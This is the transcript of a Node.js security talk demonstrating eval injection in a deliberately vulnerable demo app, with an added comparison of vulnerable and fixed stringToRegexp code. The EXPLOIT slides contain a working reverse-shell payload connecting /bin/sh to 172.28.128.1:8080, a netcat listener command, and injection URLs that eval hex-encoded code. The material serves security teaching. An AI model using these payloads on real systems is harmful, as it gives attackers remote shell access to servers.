node js reverse shell

Post on 22-Jan-2018


TRANSCRIPT

NODE JS SECURITY VULNERABILITIES

ABOUT ME

Madhu Akula - Automation Security Ninja at Appsecco. Interested in Security & DevOps. Never ending learner!

@madhuakula

WHAT IS NODE JS?

Node.js is an open-source, cross-platform runtime environment for developing server-side Web applications.

Although Node.js is not a JavaScript framework, many of its basic modules are written in JavaScript, and developers can write new modules in JavaScript. The runtime environment interprets JavaScript using Google's V8 JavaScript engine.

(Wikipedia)

HELLO WORLD HTTP SERVER IN NODE JS

var http = require('http');

// Minimal HTTP server: every request gets a 200 with a plain-text body
var server = http.createServer(function (req, res) {
  res.writeHead(200);
  res.end('Hello World');
});
server.listen(2000);

WHY NODE JS SECURITY?

A lot of applications are moving to JavaScript, especially with the MEAN (Mongo-Express-Angular-Node) stack.

HOW TO TEST NODE JS SECURITY?

It is similar to normal web application security testing, with additional checks for JavaScript-specific vulnerabilities.

DEMO TIME

VULNERABLE NODE JS CODE

'use strict';
const http = require('http');
const url = require('url');
const path = require('path');

// The data set the query is matched against
const animalsJSON = path.join(__dirname, 'animals.json');
const animals = require(animalsJSON);

function requestHandler(req, res) {
  // ?name=... arrives here as attacker-controlled input
  let urlParams = url.parse(req.url, true);
  let queryData = urlParams.query;

  res.writeHead(200, { "Content-Type": "application/json" });
  // ... the rest of the handler (the stringToRegexp lookup over `animals`) is not shown on the slide
}

ACCESS THE APPLICATION

http://localhost:3000/?name=do*

IDENTIFICATION

The stringToRegexp function evaluates user input to create a RegExp object and uses it to find elements in an array.

return eval(prefix + output + suffix); // we control the output value

We can insert our own JavaScript code into the output variable and have it executed. stringToRegexp escapes some characters before the output value is evaluated, which is why the reverse-shell payload further on is delivered hex-encoded and decoded at runtime.

http://localhost:3000/?name=["./;require('util').log('Owned');//*"]

EXPLOIT

(function () {
  var net = require("net"),
      cp = require("child_process"),
      sh = cp.spawn("/bin/sh", []);
  var client = new net.Socket();
  client.connect(8080, "172.28.128.1", function () {
    // wire the TCP socket to the shell's stdin/stdout/stderr
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
  });
  return /a/; // hand back a RegExp so the vulnerable helper does not crash the app
})();

START NETCAT LISTENER

nc -lvp 8080

SAMPLE URL

http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"]

(The new Buffer(string, encoding) constructor is deprecated in current Node.js releases; Buffer.from('PAYLOAD', 'hex') is the equivalent.)

HEX PAYLOAD CREATION USING PYTHON

>>> payload = 'nodejs reverse shell JavaScript code'
>>> payload.encode('hex')

(str.encode('hex') is Python 2 only; on Python 3 use payload.encode().hex() or binascii.hexlify(payload.encode()).)

FINAL URL WITH PAYLOAD (the hex string, the encoded reverse shell from the previous slide, is omitted here)

http://localhost:3000/?name=["./;eval(new Buffer('<hex payload>', 'hex').toString());//*"]

CHECK YOUR NETCAT LISTENER

CONCLUSION

It is highly recommended to avoid using the eval function in a JavaScript project. The fix was rather simple: they started using the RegExp object directly.
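To make the conclusion concrete, here is an added example (not code from the slides or from the vulnerable app) of a toy stringToRegexp built the way the talk describes, eval over a concatenated source string, next to the RegExp-based replacement the conclusion recommends. The animals list, the sink marker, the INJECTION string, the allow-list pattern and the function names are constructed for illustration; the real helper and its escaping rules are not reproduced on the slides.

```javascript
// Added example, not the slides' code: an eval-based stringToRegexp next to the
// RegExp-based fix. `animals`, `sink`, INJECTION and the allow-list pattern are
// constructed assumptions; the real app's helper is not shown on the slides.
const animals = ['dog', 'dolphin', 'donkey', 'cat', 'cow']; // constructed sample data

// Marker that only attacker-supplied code can flip; stands in for the
// require('util').log('Owned') side effect used in the talk.
const sink = { owned: false };

// Vulnerable: user input becomes part of a source string that is eval'ed.
// Same shape as `return eval(prefix + output + suffix)` on the identification slide.
function stringToRegexpEval(input) {
  const prefix = '/^';
  const suffix = '/i';
  const output = input; // no escaping in this simplified version
  return eval(prefix + output + suffix); // attacker-controlled code runs here
}

// Hardened: the input is compiled as a pattern, never parsed as code, and an
// allow-list keeps patterns short and simple (unbounded user patterns still
// risk ReDoS even though no code execution is possible).
function stringToRegexpSafe(input) {
  if (!/^[\w.*?+-]{1,64}$/.test(input)) {
    throw new Error('invalid pattern');
  }
  return new RegExp('^' + input, 'i');
}

// The lookup the handler performs: keep the animals the pattern matches.
function findAnimals(buildRegexp, query) {
  const re = buildRegexp(query);
  return animals.filter((name) => re.test(name));
}

// Closes the regex literal early, runs a statement, and leaves a harmless
// regex as the last value so the vulnerable helper still returns a RegExp;
// the trailing `//` comments out the suffix (same trick as the slides' `//*"]`).
const INJECTION = 'x/;sink.owned=true;/a/;//';

// Runs both helpers against a benign query and the injection and reports
// what happened, so the difference can be checked rather than printed.
function runScenario() {
  sink.owned = false;
  const benign = findAnimals(stringToRegexpEval, 'do*');   // ['dog','dolphin','donkey']
  const ownedBefore = sink.owned;                          // false
  const injected = findAnimals(stringToRegexpEval, INJECTION); // ['cat'], from /a/
  const ownedAfter = sink.owned;                           // true: code ran

  const safeBenign = findAnimals(stringToRegexpSafe, 'do*'); // same matches, no eval
  let safeRejected = false;
  try {
    stringToRegexpSafe(INJECTION);                         // '/', ';', '=' are not allowed
  } catch (e) {
    safeRejected = true;
  }
  return { benign, ownedBefore, injected, ownedAfter, safeBenign, safeRejected };
}
```

Even without the allow-list, new RegExp(input) treats the string purely as a pattern, so the injection above would just fail to match anything; the allow-list is there because the RegExp constructor still compiles whatever the attacker sends, and a long, nested pattern can be used for ReDoS.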

WANT TO TRY IT YOURSELF?

https://github.com/appsecco/vulnerable-apps

docker run -p 3000:3000 -d appsecco/node-reverse-shell

PLAYGROUND FOR NODEJS VULNERABILITIES

DAMN VULNERABLE NODE APPLICATION

Ansible Playbook & Docker

NODE JS SECURITY REFERENCES

https://www.npmjs.com/package/helmet

https://blog.risingstack.com/node-js-security-checklist/

https://nodesecurity.io/resources

https://groups.google.com/forum/#!forum/nodejs-sec

THANK YOU

Q&A

@MADHUAKULA
